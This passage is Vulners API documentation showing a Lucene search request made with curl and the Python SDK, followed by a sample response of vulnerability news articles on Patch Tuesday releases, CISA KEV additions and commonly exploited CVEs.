Vulners API Methods
Introduction
This documentation offers a clear guide for developers on how to use the Vulners API. It includes essential API methods for interacting with the Vulners database, such as retrieving OS vulnerabilities, managing collections, utilizing webhooks, and more. Each method is presented with its SDK equivalent (where applicable), CURL commands, required parameters, and expected responses. This guide aims to assist developers in efficiently integrating Vulners' extensive cybersecurity data into their applications and systems.
Additionally, each curl command in this documentation can include both required and optional parameters to tailor the API request. A "fields" parameter is also available for specifying which data fields should be returned in the response, so the output can be trimmed to what the caller needs. For those using the Python SDK, the default set of fields returned is as follows:
- id
- title
- description
- type
- bulletinFamily
- cvss
- published
- modified
- lastseen
- href
- sourceHref
- sourceData
- cvelist
This predefined set ensures that the most relevant information is readily available, while also providing the option to customize the output further by specifying different fields if necessary.
Basics
Search in database
The database search feature is similar to the search on the Vulners website.
Required parameters:
- query (str): Search query by Lucene syntax
- skip (int): number of leading results to skip (paging offset; 0 for the first page)
- size (int): count of output elements
- apiKey (str): Activated API key
Query:
POST /api/v3/search/lucene/
Query example:
curl -XPOST https://vulners.com/api/v3/search/lucene -H 'Content-Type: application/json' -d '{
"query": "Fortinet AND RCE order:published",
"skip": 0,
"size": 5,
"fields": [
"id",
"published",
"description",
"type",
"title",
"cvelist"],
"apiKey": "{API key}"
}'
import vulners

# Initialise the SDK client with an activated API key.
vulners_api = vulners.Vulners(api_key="{API key}")
database_search_1 = vulners_api.find_all(
"Fortinet AND RCE order:published", limit=5, fields=["published", "title", "description", "cvelist"])
[
{
"cvelist": [
"CVE-2024-20674",
"CVE-2024-20677",
"CVE-2024-20700"
],
"description": "Microsoft has issued patches for 48 security vulnerabilities in the first Patch Tuesday of 2024. With a relatively low number of patches\u2014and only two of them critical\u2014this makes it a relatively quiet month, which is certainly not the norm in January.\n\nThe Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVE IDs for the two critical vulnerabilities are:\n\n[CVE-2024-20674](<https://vulners.com/cve/CVE-2024-20674>) is a Windows Kerberos security feature bypass vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 9.0 out of 10. An authenticated attacker could exploit this vulnerability by establishing a [machine-in-the-middle (MITM)](<https://www.malwarebytes.com/glossary/man-in-the-middle-mitm>) attack or other local network spoofing technique, then sending a malicious Kerberos message to the client victim machine to spoof itself as the Kerberos authentication server.\n\nKerberos is an authentication protocol that is used to verify the identity of a user or host. To make use of this vulnerability the attacker will need to gain access to the restricted network before being able to run an attack. Nevertheless Microsoft thinks exploitation is \u201cmore likely,\u201d which means the vulnerability could be exploited as part of an attack chain.\n\n[CVE-2024-20700](<https://vulners.com/cve/CVE-2024-20700>) is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 7.5 out of 10. Successful exploitation of this vulnerability might be hard because it requires an attacker to win a race condition and they will need to first gain access to the restricted network before running an attack.\n\nHyper-V is the Windows hardware virtualization service. 
It enables users to create and run a software version of a computer, called a [virtual machine](<https://www.malwarebytes.com/glossary/virtual-machine>). Sometimes these virtual machines are attractive targets for cybercriminals. But the advisory is not very clear on the exact circumstances or context that would allow the RCE.\n\nOne other vulnerability, classified as important, that might turn out to be of interest, at least for some users, is:\n\n[CVE-2024-20677](<https://vulners.com/cve/CVE-2024-20677>) is a Microsoft Office Remote Code Execution (RCE) vulnerability with a CVSS score of 7.8 out of 10. The security vulnerability exists in FBX that could lead to remote code execution. To mitigate this vulnerability, the ability to insert FBX files has been disabled in Word, Excel, PowerPoint and Outlook for Windows and Mac. Versions of Office that had this feature enabled will no longer have access to it. This includes Office 2019, Office 2021, Office LTSC for Mac 2021, and Microsoft 365.\n\nFBX files are a type of 3D model file created using the Autodesk FBX software. When you try to insert an FBX file into Word, Excel, PowerPoint, and Outlook, you will see the following error: \u201cAn error occurred while importing this file.\u201d If you\u2019d like to re-enable this ability, you can find the reasons why you shouldn\u2019t and the method how to do it on this [Microsoft Support page](<https://support.microsoft.com/en-au/topic/support-for-fbx-files-has-been-turned-off-in-office-9f2387f1-84ec-496a-a288-2c6f774db219>).\n\n### Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. 
Here are few major ones that you may find in your environment.\n\n * Adobe [released a patch](<https://helpx.adobe.com/security/products/substance3d_stager/apsb24-06.html>) addressing six CVEs in Substance 3D Stager.\n * Google published the [Android Security Bulletin for January 2024](<https://source.android.com/docs/security/bulletin/2024-01-01>).\n * Fortinet has [released a security update](<https://www.fortiguard.com/psirt/FG-IR-23-315>) to address a vulnerability in FortiOS and FortiProxy software.\n * SAP has released its [January 2024 Patch Day](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) updates.\n\n* * *\n\n**We don\u2019t just report on vulnerabilities\u2014we identify them, and prioritize action.**\n\nCybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using [ThreatDown Vulnerability and Patch Management](<https://www.malwarebytes.com/business/vulnerability-patch-management>).",
"published": "2024-01-10T18:07:38",
"type": "malwarebytes",
"title": "Patch now! First patch Tuesday of 2024 is here"
},
{
"cvelist": [
"CVE-2022-3236",
"CVE-2023-21751",
"CVE-2023-35628",
"CVE-2023-35630",
"CVE-2023-35636",
"CVE-2023-35638",
"CVE-2023-35639",
"CVE-2023-35641",
"CVE-2023-35642",
"CVE-2023-35643",
"CVE-2023-36012",
"CVE-2023-36019"
],
"description": "[![Microsoft](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitNgqCUKiZvap6tAh5CSF1qXS_qapv34Of7TuQ3FMuN7seycUe7Z0tblPbfbeap94-KacqYaL3ILXkD6PnKrR93fbdrEUktLtB7b8P2OBMGf34Nf9GY2ZpYxLJGbimY5UBB6Gp5WsxRtERt2WF3T63g49hi3B8W4GPeKAT4csfIq7pnEFmv06755oLVkA_/s728-rw-ft-e30/windows.jpg>)\n\nMicrosoft released its final set of Patch Tuesday updates for 2023, closing out 34 flaws in its software, making it one of the lightest releases in recent years.\n\nOf the 34 shortcomings, four are rated Critical and 30 are rated Important in severity. The fixes are in addition to [18 flaws](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) Microsoft addressed in its Chromium-based Edge browser since the release of [Patch Tuesday updates for November 2023](<https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html>).\n\nAccording to data from the [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2023/12/12/the-december-2023-security-update-review>), the software giant has patched more than 900 flaws this year, making it one of the busiest years for Microsoft patches. 
For comparison, Redmond [resolved 917 CVEs](<https://www.tenable.com/blog/microsoft-patch-tuesday-2023-year-in-review>) in 2022.\n\nWhile none of the vulnerabilities are listed as publicly known or under active attack at the time of release, some of the notable ones are listed below -\n\n * [**CVE-2023-35628**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35628>) (CVSS score: 8.1) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2023-35630**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35630>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n * [**CVE-2023-35636**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636>) (CVSS score: 6.5) - Microsoft Outlook Information Disclosure Vulnerability\n * [**CVE-2023-35639**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35639>) (CVSS score: 8.8) - Microsoft ODBC Driver Remote Code Execution Vulnerability\n * [**CVE-2023-35641**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35641>) (CVSS score: 8.8) - Internet Connection Sharing (ICS) Remote Code Execution Vulnerability\n * [**CVE-2023-35642**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35642>) (CVSS score: 6.5) - Internet Connection Sharing (ICS) Denial-of-Service Vulnerability\n * [**CVE-2023-36019**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36019>) (CVSS score: 9.6) - Microsoft Power Platform Connector Spoofing Vulnerability\n\nCVE-2023-36019 is also significant because it allows the attacker to send a specially crafted URL to the target, resulting in the execution of malicious scripts in the victim's browser on their machine.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/BHcgTukm> \"Cybersecurity\" )\n\n\"An attacker could manipulate a malicious link, 
application, or file to disguise it as a legitimate link or file to trick the victim,\" Microsoft said in an advisory.\n\nMicrosoft's Patch Tuesday update also plugs three flaws in the Dynamic Host Configuration Protocol (DHCP) server service that could lead to a denial-of-service or information disclosure -\n\n * [**CVE-2023-35638**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35638>) (CVSS score: 7.5) - DHCP Server Service Denial-of-Service Vulnerability\n * [**CVE-2023-35643**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35643>) (CVSS score: 7.5) - DHCP Server Service Information Disclosure Vulnerability\n * [**CVE-2023-36012**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36012>) (CVSS score: 5.3) - DHCP Server Service Information Disclosure Vulnerability\n\nThe disclosure also comes as Akamai discovered a new set of attacks against Active Directory domains that use Microsoft Dynamic Host Configuration Protocol ([DHCP](<https://learn.microsoft.com/en-us/windows-server/networking/technologies/dhcp/dhcp-top>)) servers.\n\n\"These attacks could allow attackers to spoof sensitive DNS records, resulting in varying consequences from credential theft to full Active Directory domain compromise,\" Ori David [said](<https://www.akamai.com/blog/security-research/spoofing-dns-by-abusing-dhcp>) in a report last week. 
\"The attacks don't require any credentials, and work with the default configuration of [Microsoft DHCP server](<https://www.trustedsec.com/blog/injecting-rogue-dns-records-using-dhcp>).\"\n\nThe web infrastructure and security company further noted the impact of the flaws can be significant as they can be exploited to spoof DNS records on Microsoft DNS servers, including an unauthenticated arbitrary DNS record overwrite, thereby enabling an actor to gain a machine-in-the-middle position on hosts in the domain and access sensitive data.\n\nMicrosoft, in response to the findings, said the \"problems are either by design, or not severe enough to receive a fix,\" necessitating that users Disable DHCP DNS Dynamic Updates if not required and refrain from using DNSUpdateProxy.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/3UvK59NV> \"Cybersecurity\" )\n\n## Software Patches from Other Vendors\n\nOutside of Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Amazon Web Services](<https://aws.amazon.com/security/security-bulletins/>)\n * [Android](<https://source.android.com/docs/security/bulletin/2023-12-01>)\n * [Apache Projects](<https://projects.apache.org/releases.html>) (including [Apache Struts](<https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html>))\n * [Apple](<https://thehackernews.com/2023/12/apple-releases-security-updates-to.html>)\n * [Arm](<https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities>)\n * [Atlassian](<https://thehackernews.com/2023/12/atlassian-releases-critical-software.html>)\n * [Atos](<https://unify.com/en/support/security-advisories>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * 
[CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Drupal](<https://www.drupal.org/security>)\n * [F5](<https://my.f5.com/manage/s/new-updated-articles#sort=%40f5_updated_published_date%20descending&f:@f5_document_type=\\[Security%20Advisory\\]&periodFilter=0&dateField=1>)\n * [Fortinet](<https://www.fortiguard.com/psirt>)\n * [GitLab](<https://about.gitlab.com/releases/2023/11/30/security-release-gitlab-16-6-1-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/>)\n * [Google Chromecast](<https://source.android.com/docs/security/bulletin/chromecast/2023-12-01>)\n * [Google Cloud](<https://cloud.google.com/support/bulletins>)\n * [Google Wear OS](<https://source.android.com/docs/security/bulletin/wear/2023/2023-12-01>)\n * [Hikvision](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/>)\n * [Hitachi Energy](<https://www.hitachienergy.com/in/en/products-and-solutions/cybersecurity/alerts-and-notifications>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Jenkins](<https://www.jenkins.io/security/advisories/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/December-2023>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n * [Mitsubishi 
Electric](<https://www.mitsubishielectric.com/en/psirt/vulnerability/index.html>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [NETGEAR](<https://www.netgear.com/about/security/>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://thehackernews.com/2023/12/qualcomm-releases-details-on-chip.html>) (including [5Ghoul](<https://thehackernews.com/2023/12/new-5g-modems-flaws-affect-ios-devices.html>))\n * [Samsung](<https://security.samsungmobile.com/securityUpdate.smsb>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories>)\n * [SonicWall](<https://www.sonicwall.com/search/#t=Support&sort=date%20descending&f:sourceTypeFacetId=\\[Notices\\]&f:@language=\\[English\\]>)\n * [Sophos](<https://www.sophos.com/en-us/security-advisories>) (backports a fix for [CVE-2022-3236](<https://thehackernews.com/2022/09/hackers-actively-exploiting-new-sophos.html>) to unsupported versions of the Sophos Firewall)\n * [Spring Framework](<https://spring.io/security>)\n * [Veritas](<https://www.veritas.com/support/en_US/security/>)\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n * [WordPress](<https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html>)\n * [Zoom](<https://explore.zoom.us/en/trust/security/security-bulletin/>), and\n * [Zyxel](<https://thehackernews.com/2023/12/zyxel-releases-patches-to-fix-15-flaws.html>)\n\n_(The story was updated after publication to modify the number of flaws patched by Microsoft and take into account _[_CVE-2023-21751_](<https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-21751>)_. 
Microsoft released an advisory for the vulnerability a day after the release of Patch Tuesday updates.)_\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-12-13T05:50:00",
"type": "thn",
"title": "Microsoft's Final 2023 Patch Tuesday: 34 Flaws Fixed, Including 4 Critical"
},
{
"cvelist": [
"CVE-2020-2551",
"CVE-2023-1671",
"CVE-2023-2551",
"CVE-2023-34992",
"CVE-2023-36553",
"CVE-2023-36584",
"CVE-2023-36884"
],
"description": "[![Active Exploitation](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rDJj_oU45s5bhg6wX-OdktekVTvzeIJh62kVTkBLzgABhLluROoTkebmdE1plaGLH420QMUOaEYPhkIeQJw1gOjuJ7ftYRfoRVgTzPapHioBJtNsO-NuEyh812rT7OdU2IDTq2Q7UsvLjvXsSzr5DqyN9AqVFH8mkmSABiV_vvlAxAD7In4bXr4NJhrt/s728-rw-ft-e30/cisa.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities ([KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) catalog based on evidence of active exploitation in the wild.\n\nThe [vulnerabilities](<https://www.cisa.gov/news-events/alerts/2023/11/16/cisa-adds-three-known-exploited-vulnerabilities-catalog>) are as follows -\n\n * [**CVE-2023-36584**](<https://nvd.nist.gov/vuln/detail/CVE-2023-36584>) (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability\n * [**CVE-2023-1671**](<https://nvd.nist.gov/vuln/detail/CVE-2023-1671>) (CVSS score: 9.8) - Sophos Web Appliance Command Injection Vulnerability\n * [**CVE-2020-2551**](<https://nvd.nist.gov/vuln/detail/CVE-2020-2551>) (CVSS score: 9.8) - Oracle Fusion Middleware Unspecified Vulnerability\n\nCVE-2023-1671 relates to a critical [pre-auth command injection vulnerability](<https://vulncheck.com/blog/cve-2023-1671-analysis>) that allows for the execution of arbitrary code. 
CVE-2020-2551 is a [flaw](<https://www.aon.com/cyber-solutions/aon_cyber_labs/cve-2020-2551-unauthenticated-rce-in-oracle-weblogic/>) in the WLS Core Components that allows an unauthenticated attacker with network access to compromise the WebLogic Server.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/4WnFxcNN> \"Cybersecurity\" )\n\nThere are currently no public reports documenting in-the-wild attacks leveraging CVE-2023-1671, but Cybernews [disclosed](<https://cybernews.com/security/harvard-university-remote-code-execution-attack/>) in July 2023 that it had identified a subdomain of the Harvard University \u2013 courses.my.harvard[.]edu \u2013 that was susceptible to CVE-2020-2551.\n\nOn the other hand, the addition of CVE-2023-36584 to the KEV catalog is based on a report from Palo Alto Networks Unit 42 earlier this week, which [detailed](<https://unit42.paloaltonetworks.com/new-cve-2023-36584-discovered-in-attack-chain-used-by-russian-apt/>) spear-phishing attacks mounted by pro-Russian APT group known as Storm-0978 (aka RomCom or Void Rabisu) targeting groups supporting Ukraine's admission into NATO in July 2023.\n\nCVE-2023-36584, [patched](<https://thehackernews.com/2023/10/microsoft-releases-october-2023-patches.html>) by Microsoft as part of October 2023 security updates, is said to have been used alongside [CVE-2023-36884](<https://www.trellix.com/about/newsroom/stories/research/breaking-down-cve-2023-36884-and-the-infection-chain/>), a Windows remote code execution vulnerability [addressed](<https://thehackernews.com/2023/07/microsoft-releases-patches-for-130.html>) in July, in an exploit chain to deliver [PEAPOD](<https://thehackernews.com/2023/10/new-peapod-cyberattack-campaign.html>), an updated version of RomCom RAT.\n\nIn light of active exploitation, federal agencies are recommended to apply the fixes by December 7, 2023, to secure their 
networks against potential threats.\n\n## Fortinet Discloses Critical Command Injection Bug in FortiSIEM\n\nThe development comes as Fortinet is alerting customers of a critical command injection vulnerability in FortiSIEM report server ([CVE-2023-36553](<https://nvd.nist.gov/vuln/detail/CVE-2023-36553>), CVSS score: 9.3) that could be exploited by attackers to execute arbitrary commands.\n\n[![Cybersecurity](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thn.news/pjHvTZON> \"Cybersecurity\" )\n\nCVE-2023-36553 has been described as a variant of [CVE-2023-34992](<https://www.fortiguard.com/psirt/FG-IR-23-130>) (CVSS score: 9.7), a similar flaw in the same product that was remediated by Fortinet in early October 2023.\n\n\"An improper neutralization of special elements used in an OS command vulnerability [[CWE-78](<https://cwe.mitre.org/data/definitions/78.html>)] in FortiSIEM report server may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests,\" the company [said](<https://www.fortiguard.com/psirt/FG-IR-23-135>) in an advisory this week.\n\nThe vulnerability, which impacts FortiSIEM versions 4.7, 4.9, 4.10, 5.0, 5.1, 5.2, 5.3, and 5.4, has been fixed in versions 7.1.0, 7.0.1, 6.7.6, 6.6.4, 6.5.2, 6.4.3, or later.\n\n### Update\n\nWhen reached for comment on the addition of CVE-2023-1671 to the KEV catalog, Sophos shared the following statement with The Hacker News -\n\n_More than six months ago, on April 4, 2023, we released an automatic patch to all Sophos Web Appliances, as noted in the _[_Security Advisory_](<https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce>)_ on our _[_Trust Center_](<https://www.sophos.com/en-us/trust>)_, and in July 2023, we\u2019ve phased out Sophos Web Appliance as previously planned. 
We appreciate CISA\u2019s notice for any of the small number of remaining Sophos Web Appliance users who turned off auto-patch and/or missed our ongoing updates, and recommend they upgrade to _[_Sophos Firewall_](<https://www.sophos.com/en-us/products/next-gen-firewall>)_ for optimal network security moving forward._\n\n_(The article was updated after publication to mention that the third security flaw added to the KEV catalog is CVE-2020-2551 and not CVE-2023-2551, which was erroneously referenced in the alert published by CISA.)_\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n",
"published": "2023-11-17T05:57:00",
"type": "thn",
"title": "CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog"
},
{
"cvelist": [
"CVE-2012-0158",
"CVE-2012-0507",
"CVE-2012-1723",
"CVE-2013-0074",
"CVE-2014-6271",
"CVE-2017-0143",
"CVE-2017-0144",
"CVE-2017-0145",
"CVE-2017-0199",
"CVE-2017-11882",
"CVE-2017-8570",
"CVE-2018-0802",
"CVE-2018-13379",
"CVE-2018-8174",
"CVE-2019-11510",
"CVE-2019-19781",
"CVE-2019-2725",
"CVE-2020-1472",
"CVE-2021-26084",
"CVE-2021-26855",
"CVE-2021-31207",
"CVE-2021-34473",
"CVE-2021-34523",
"CVE-2021-44228"
],
"description": "The earlier blog posts showcased an overview of the **vulnerability threat landscape** that is either remotely exploited or most targeted by attackers._ _A quick recap \u2013 We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.\n\nThis blog post will focus on **Qualys\u2019 Top Twenty Vulnerabilities, **targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.\n\nSome of these vulnerabilities are part of the recent [**CISA Joint Cybersecurity Advisory (CSA)**](<https://www.cisa.gov/news-events/alerts/2023/08/03/cisa-nsa-fbi-and-international-partners-release-joint-csa-top-routinely-exploited-vulnerabilities>)**,** published on August 3, 2023; you can access it from [**2022 Top Routinely Exploited Vulnerabilities**](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a>)**.**\n\nRead on- \n\n## Stats on the Top 20 Vulnerable Vendors & By-Products\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-1.-Top-20-Vulnerable-Vendor-1070x694.png)**Fig 1. Top Vulnerable Vendor**\n\n![](https://ik.imagekit.io/qualys/wp-content/uploads/2023/08/Fig-2.-Top-20-Vulnerable-Products-1070x708.png)**Fig 2. Top Vulnerable Products**\n\n## Top Twenty Most Targeted by Attackers\n\n### **1. CVE-2017-11882: Microsoft Office Memory Corruption Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2021, 2022, 2023 (79 times)**\n\nIt was exploited by 467 Malware, 53 Threat Actors, and 14 Ransomware and was trending in the wild as recently as August 31, 2023. 
\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\n**Qualys Vulnerability Detection (QID): 110308**\n\nDisclosed in 2017, CVE-2017-11882 is a **significant memory corruption vulnerability** in Microsoft Office's Equation Editor. It could enable an attacker to execute arbitrary code under the current user's permissions. \n\nIf the user has administrative rights, the attacker could gain complete control of the system, install programs, alter data, or create new user accounts with full privileges. This vulnerability will be exploited if the user opens a specially crafted file, potentially sent via email or hosted on a compromised website.\n\nIt\u2019s been primarily exploited in various cyber-attacks and espionage campaigns.\n\n### 2\\. **CVE-2017-0199: Microsoft Wordpad Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (59 times)**\n\nIt was exploited by 93 Malware, 53 Threat Actors, and 5 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID): 110297**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier.**\n\nCVE-2017-0199 is a notable remote code execution vulnerability that affects specific Microsoft Office and WordPad versions precisely when they parse specially crafted files. This vulnerability is the most favored vulnerability by malware, threat actors, and ransomware. \n\nIf successfully exploited, an attacker could execute arbitrary code in the current user's security context, potentially taking control of the system. Exploitation involves a user opening or previewing a maliciously crafted file, often sent via email. Microsoft has addressed this vulnerability by correcting how Office and WordPad parse these files and by enabling certain API functionality in Windows for further resolution.\n\n### 3\\. 
**CVE-2012-0158: Vulnerability in Windows Common Controls Could Allow RCE**\n\n**Vulnerability Trending Over Years: 2013, 2020, 2021, 2023 (33 times)**\n\nIt was exploited by 63 Malware, 45 Threat Actors, 2 Ransomware and was trending in the wild as recently as August 31, 2023.\n\n**Qualys Vulnerability Detection (QID): 90793**\n\nCVE-2012-0158 is a substantial remote code execution vulnerability in Windows standard controls. An attacker can exploit the flaw by constructing a specially crafted webpage. Upon viewing this webpage, the vulnerability can allow remote code execution, potentially granting the attacker the same rights as the logged-on user. \n\nIf the user has administrative privileges, this could mean total control of the affected system. Disclosed in 2012, this vulnerability has been notably exploited in various cyber-attacks, enabling attackers to install programs, manipulate data, or create new accounts with full user rights.\n\n### 4\\. **CVE-2017-8570: Microsoft Office Remote Code Execution Vulnerability**\n\n**Vulnerability Trending Over Years: 2018, 2020, 2023 (25 times)**\n\nIt was exploited by 52 Malware 11 Threat Actors and was trending in the wild as recently as September 2, 2023\n\n**Qualys Vulnerability Detection (QID): 110300**\n\nCVE-2017-8570 is a significant remote code execution vulnerability in Microsoft Office and WordPad. It involves the way these applications handle specially crafted files. It can be exploited by an attacker who convinces a user to open a specially designed file, potentially allowing the attacker to run arbitrary code on the victim's machine with the same privileges as the logged-in user and serving as a downloader to other high-profile malware.\n\n### 5\\. 
**CVE-2020-1472: Zerologon - An Unauthenticated Privilege Escalation to Full Domain Privileges**\n\n**Vulnerability Trending Over Years: 2020, 2021, 2022, 2023 (56 times)**\n\nIt was exploited by 18 Malware, 16 Threat Actors, 11 Ransomware and was trending in the wild as recently as September 4, 2023.\n\n**Qualys Vulnerability Detection (QID):** **91680**\n\n**In the "Additional Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nCVE-2020-1472, or **Zerologon, is a severe vulnerability in Microsoft's Netlogon Remote Protocol** due to a flawed implementation of AES-CFB8 encryption.\n\nUsing a fixed initialization vector and accepting unencrypted sessions allows an attacker to impersonate a server and compromise the entire Windows domain. The attacker takes control over all the Active Directory identity services.\n\n### 6\\. **CVE-2017-0144, CVE-2017-0145, CVE-2017-0143: Windows SMBv1 Remote Code Execution Vulnerability WannaCry, Petya**\n\n**Vulnerability Trending Over Years: 2017, 2020, 2021, 2023 (50 times)**\n\nIt was exploited by 12 Malware, 10 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 1, 2023.\n\n**Qualys Vulnerability Detection (QID): 91361, 91360, 91359, 91345**\n\nCommonly known as Shadow Broker or MS17-010, or "ETERNALBLUE," or "ETERNALSYNERGY" or "ETERNAL ROMANCE" is a remote code execution vulnerability in Microsoft's Server Message Block 1.0 (SMBv1) protocol.\n\nThe vulnerability arises from how SMBv1 handles specific requests, allowing an attacker(usually authenticated) to send a specially crafted packet to an SMBv1 server, enabling them to execute code on the target server.\n\nIt was infamously exploited in the widespread WannaCry ransomware attack in 2017, leading to global data encryption and ransom demands.\n\n### 7\\. 
**CVE-2012-1723: Java Applet Field Bytecode Verifier Cache Remote Code Execution**\n\n**Vulnerability Trending Over Years: 2023 (6 times)**\n\nIt was exploited by 91 Malware, 8 Threat Actors, 41 Ransomware and was trending in the wild as recently as August 17, 2023.\n\n**Qualys Vulnerability Detection (QID): 120274**\n\nCVE-2012-1723 is a substantial vulnerability found in the Java Runtime Environment. It can be exploited through a malicious web page, hosting a rogue Java applet can be exploited through a malicious web page hosting rogue Java applet.\n\nThe issue, originating from a type-confusion error in the "HotSpot" component, allows untrusted Java applets or applications to bypass the Java sandbox security restrictions and execute arbitrary code on a user's system\n\n### 8\\. **CVE-2021-34473, CVE-2021-34523, CVE-2021-31207: Microsoft Exchange Server RCE (ProxyShell)**\n\n**Vulnerability Trending Over Years: 2021, 2022, 2023 (39 times)**\n\nIt was exploited by 12 Malware, 20 Threat Actors, and 12 Ransomware and was trending in the wild as recently as September 2, 2023.\n\n**Qualys Vulnerability Detection (QID): 50114, 50111, 50112**\n\n**In the "Top 12 Routinely Exploited Vulnerabilities in 2022" list, published by CISA earlier. **\n\nProxyShell, a chain of vulnerabilities that impacts on-premises Microsoft Exchange Servers, is widely used for email and associated services globally.\n\nThese vulnerabilities exist in the Microsoft Client Access Service (CAS), typically running on port 443 in IIS, often exposed to the internet to allow users to 